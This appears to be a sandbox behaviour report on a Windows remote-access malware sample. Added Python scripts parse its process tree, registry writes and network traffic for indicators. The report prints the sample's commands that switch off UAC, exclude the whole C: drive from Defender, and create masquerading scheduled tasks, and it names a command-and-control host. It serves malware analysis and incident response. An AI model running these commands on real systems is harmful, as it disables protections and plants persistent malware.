PID 600 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Default User\services.exe
PID 5040 wrote to memory of 5592 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5040 wrote to memory of 5644 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5592 wrote to memory of 5804 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5804 wrote to memory of 5980 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5804 wrote to memory of 6028 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5980 wrote to memory of 6124 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 6124 wrote to memory of 5080 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 5080 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 884 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 884 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5080 wrote to memory of 4780 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5080 wrote to memory of 4780 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 4780 wrote to memory of 3380 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 3380 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 560 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 560 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 3380 wrote to memory of 2416 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 3380 wrote to memory of 2416 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 2416 wrote to memory of 4680 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 4680 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 1472 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 1472 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4680 wrote to memory of 5964 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 4680 wrote to memory of 5964 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5964 wrote to memory of 400 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 400 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 1056 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 1056 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
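The cross-process write rows above line up with process creation in the Processes list, so they can be read as a parent/child tree. Walking that tree shows the persistence loop this sample uses: services.exe starts two WScript.exe hosts, one of which starts a fresh services.exe, and the cycle repeats six times inside the 149 s detonation window. The script below is an added example (not part of the sandbox report or of any DCRat tooling) that parses rows in the report's own format, keys nodes on PID plus image because PID 4780 is reused by two different processes in the trace, and returns the PIDs of each payload generation. The input is a constructed subset of the rows above with the sample's hash name shortened to sample.exe. Note that C:\Users\Default User is a junction to C:\Users\Default, which is why the Files section lists the drop as C:\Users\Default\services.exe.

```python
import re
from collections import defaultdict

# One sandbox row per cross-process write:
#   PID <writer> wrote to memory of <target> N/A <writer image> <target image>
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.*?) (C:\\.*)$")

# Constructed subset of the rows above; the sample's hash name is shortened to
# sample.exe. The 600 -> 5040 row is repeated on purpose, as the report lists it twice.
ROWS = r"""
PID 600 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Users\Default User\services.exe
PID 600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Users\Default User\services.exe
PID 5040 wrote to memory of 5592 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5040 wrote to memory of 5644 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5592 wrote to memory of 5804 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5804 wrote to memory of 5980 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5804 wrote to memory of 6028 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5980 wrote to memory of 6124 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 6124 wrote to memory of 5080 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 884 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5080 wrote to memory of 4780 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 4780 wrote to memory of 3380 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 560 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 3380 wrote to memory of 2416 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 2416 wrote to memory of 4680 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 1472 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4680 wrote to memory of 5964 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5964 wrote to memory of 400 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 1056 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
"""


def parse_rows(text):
    """Unique (writer_pid, writer_image, target_pid, target_image) edges, images lower-cased."""
    edges, seen = [], set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        edge = (int(src), src_img.lower(), int(dst), dst_img.lower())
        if edge not in seen:  # the sandbox reports some writes twice
            seen.add(edge)
            edges.append(edge)
    return edges


def build_tree(edges):
    """Children map keyed on (pid, image), not the bare pid: PID 4780 is first a
    powershell.exe child of 600 and later a services.exe child of 5080, and keying
    on the pid alone would fuse those two unrelated processes."""
    children = defaultdict(list)
    for src, src_img, dst, dst_img in edges:
        children[(src, src_img)].append((dst, dst_img))
    return children


def roots(edges):
    """Nodes that write to others but are never written to: the initial sample."""
    targets = {(dst, dst_img) for _, _, dst, dst_img in edges}
    return sorted({(src, src_img) for src, src_img, _, _ in edges} - targets)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def deepest_path(children, node):
    """Longest root-to-leaf chain as a list of (pid, image) nodes."""
    best = [node]
    for child in children.get(node, []):
        candidate = [node] + deepest_path(children, child)
        if len(candidate) > len(best):
            best = candidate
    return best


def relaunch_loop(children, root, payload="services.exe", launcher="wscript.exe"):
    """PIDs of each payload generation when the deepest chain strictly alternates
    payload -> script host -> payload; an empty list if the tree has no such loop."""
    path = deepest_path(children, root)
    images = [basename(img) for _, img in path[1:]]
    expected = [payload if i % 2 == 0 else launcher for i in range(len(images))]
    if images != expected:
        return []
    return [pid for pid, img in path[1:] if basename(img) == payload]


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    tree = build_tree(edges)
    for root in roots(edges):
        print("root:", root, "generations:", relaunch_loop(tree, root))
```

Each generation starts two script hosts but only one of them relaunches the payload; the second WScript.exe in every pair (5644, 6028, 884, 560, 1472, 1056) is a leaf. The two .vbs files dropped per generation in the Processes list match that split, and the VBS contents are where an analyst would look next to confirm which one is the relauncher and which one is cleanup.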

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
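The three values written above are the whole UAC policy surface that matters for an attacker who already holds an elevated token: EnableLUA = 0 switches UAC off after the next reboot, ConsentPromptBehaviorAdmin = 0 makes elevation requests succeed without any consent dialog until then, and PromptOnSecureDesktop = 0 moves whatever prompt remains onto the normal desktop, where software can draw over it or click it. All three live under HKLM, so the writes themselves prove the sample was already running as an administrator. The script below is an added example (not part of the report) that parses rows in the report's own format, compares each value against a stock-Windows baseline, and reports which processes weakened which setting. The baseline values are an assumption stated in the code; the input is a constructed subset of the rows above plus one benign, unrelated registry write for contrast.

```python
import re

POLICY_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Stock Windows defaults for the values the sample touched (assumption: a domain
# policy may set different values; ConsentPromptBehaviorAdmin = 5 prompts for
# consent on non-Windows binaries).
BASELINE = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}

IMPACT = {
    "EnableLUA": "UAC off after next reboot; admin logons run fully elevated",
    "ConsentPromptBehaviorAdmin": "elevation granted silently, no consent dialog",
    "PromptOnSecureDesktop": "remaining prompts drawn on the interactive desktop, where software can spoof or click them",
}

# Rows look like: Set value (int) <key>\<value> = "<data>" <process> N/A
ROW_RE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\.+)\\(\w+) = "([^"]*)" (.+?) N/A$')

# Constructed subset of the rows above (sample name shortened); the last row is a
# constructed benign write to a different key, included to show it is ignored.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1" C:\Windows\explorer.exe N/A
"""


def parse_registry_rows(text):
    writes = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            kind, key, name, data, proc = m.groups()
            writes.append({"type": kind, "key": key, "name": name, "data": data, "process": proc})
    return writes


def uac_findings(writes):
    """One finding per weakened policy value, with the set of processes that wrote it."""
    findings = {}
    for w in writes:
        if w["key"].lower() != POLICY_KEY.lower() or w["name"] not in BASELINE:
            continue
        observed = int(w["data"])
        if observed == BASELINE[w["name"]]:
            continue
        f = findings.setdefault(w["name"], {"observed": observed, "expected": BASELINE[w["name"]],
                                             "processes": set(), "impact": IMPACT[w["name"]]})
        f["processes"].add(w["process"].rsplit("\\", 1)[-1])
    return findings


def uac_effectively_disabled(findings):
    """True when admin elevation no longer involves the user at all."""
    lua_off = findings.get("EnableLUA", {}).get("observed") == 0
    silent = findings.get("ConsentPromptBehaviorAdmin", {}).get("observed") == 0
    return lua_off or silent


def live_policy_values():
    """Same three values read from a live Windows host; {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System")
    out = {}
    for name in BASELINE:
        try:
            out[name] = winreg.QueryValueEx(key, name)[0]
        except FileNotFoundError:
            out[name] = None  # value absent: Windows falls back to its built-in default
    return out


if __name__ == "__main__":
    for name, f in uac_findings(parse_registry_rows(SAMPLE_ROWS)).items():
        print(f"{name}: {f['observed']} (expected {f['expected']}) by {sorted(f['processes'])}; {f['impact']}")
```

During incident response the same three values are worth reading back on the affected host with live_policy_values(); a machine where they still read 0 after cleanup is a machine where the next piece of malware will not need a UAC bypass either.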

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f490bd04-381f-4110-b2f4-69e539b85018.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\839b3450-24a3-4e67-8674-a625305c3232.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1eabff37-6dcb-470a-a6cf-a9b5df879a3e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da615cdd-6344-489f-871c-cf15683b8ce4.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f9ca633-4a53-4add-a9ba-d4ee09a483b9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1225dcb2-f8d0-4026-b32b-36261ff0439a.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d97266aa-c4c2-4a9c-af28-fac549d3e104.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da164d95-aaec-4577-a2e5-c432becd440b.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3adf8a14-133a-4c67-8f03-ebe7b621242d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4549df5f-7cc5-4942-a65a-7f572a38378d.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8780267c-9c36-4cc0-8175-f6c024588326.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58f2568b-b154-44a6-896a-a017af9fb059.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 42.197.8.141.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
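Most rows in this table are background noise: the in-addr.arpa entries are reverse lookups the sandbox and the OS make for addresses they have seen, and the bing.com/bing.net traffic is Windows itself. What is left is one forward DNS lookup for a0887556.xsph.ru followed by a dozen plain-HTTP TCP connections to 141.8.197.42:80 within the 149 s run, which is the beaconing pattern to pull out as the command-and-control indicator. The script below is an added example (not part of the report) that parses rows in the report's column order, separates the noise from attacker-chosen traffic, counts contacts per destination, and emits a flat indicator list. The allowlist is an analyst assumption and the input is a constructed subset of the rows above.

```python
import re
from collections import Counter, defaultdict

# Background traffic the analyst chooses to ignore (assumption: not from the report).
ALLOWLIST = ("bing.com", "bing.net")

# Report columns: Country Destination Domain Proto
ROW_RE = re.compile(r"^([A-Z]{2}) (\S+) (\S+) (tcp|udp)$")

# Constructed subset of the Network rows above.
SAMPLE = """\
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 42.197.8.141.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
"""


def allowlisted(domain):
    return any(domain == s or domain.endswith("." + s) for s in ALLOWLIST)


def classify(domain, dest, proto):
    if domain.endswith(".in-addr.arpa"):
        return "ptr-noise"      # reverse lookups for IPs already seen; not attacker-chosen
    if allowlisted(domain):
        return "allowlisted"
    if dest.endswith(":53") and proto == "udp":
        return "dns-lookup"     # forward lookup of a name the sample asked for
    return "connection"


def summarize(text):
    """(count per traffic class, domain -> Counter of 'ip:port/proto' contacts)."""
    kinds = Counter()
    contacts = defaultdict(Counter)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        _country, dest, domain, proto = m.groups()
        kind = classify(domain, dest, proto)
        kinds[kind] += 1
        if kind == "connection":
            contacts[domain][f"{dest}/{proto}"] += 1
    return kinds, contacts


def beacon_candidates(contacts, min_hits=3):
    """Domains contacted repeatedly during the run, most-contacted first."""
    ranked = sorted(contacts.items(), key=lambda kv: -sum(kv[1].values()))
    return [domain for domain, dests in ranked if sum(dests.values()) >= min_hits]


def iocs(contacts):
    """Flat, de-duplicated indicators: each domain plus the ip:port it was reached on."""
    out = set()
    for domain, dests in contacts.items():
        out.add(("domain", domain))
        for dest in dests:
            out.add(("ipport", dest.split("/")[0]))
    return sorted(out)


if __name__ == "__main__":
    kinds, contacts = summarize(SAMPLE)
    print(dict(kinds))
    print("beacons:", beacon_candidates(contacts))
    print("iocs:", iocs(contacts))
```

The destination is port 80, so the beacon content is recoverable from the sandbox pcap in clear text; the HTTP request path and any POSTed data are the next thing to extract, since a hostname on shared hosting such as xsph.ru says little on its own.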

Files

memory/600-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/600-1-0x00000000004C0000-0x00000000007FC000-memory.dmp

memory/600-2-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/600-3-0x000000001B3F0000-0x000000001B3FE000-memory.dmp

memory/600-4-0x000000001B510000-0x000000001B51E000-memory.dmp

memory/600-6-0x000000001B530000-0x000000001B54C000-memory.dmp

memory/600-5-0x000000001B520000-0x000000001B528000-memory.dmp

memory/600-7-0x000000001BAE0000-0x000000001BB30000-memory.dmp

memory/600-9-0x000000001B560000-0x000000001B570000-memory.dmp

memory/600-8-0x000000001B550000-0x000000001B558000-memory.dmp

memory/600-13-0x000000001B5B0000-0x000000001B5BA000-memory.dmp

memory/600-12-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

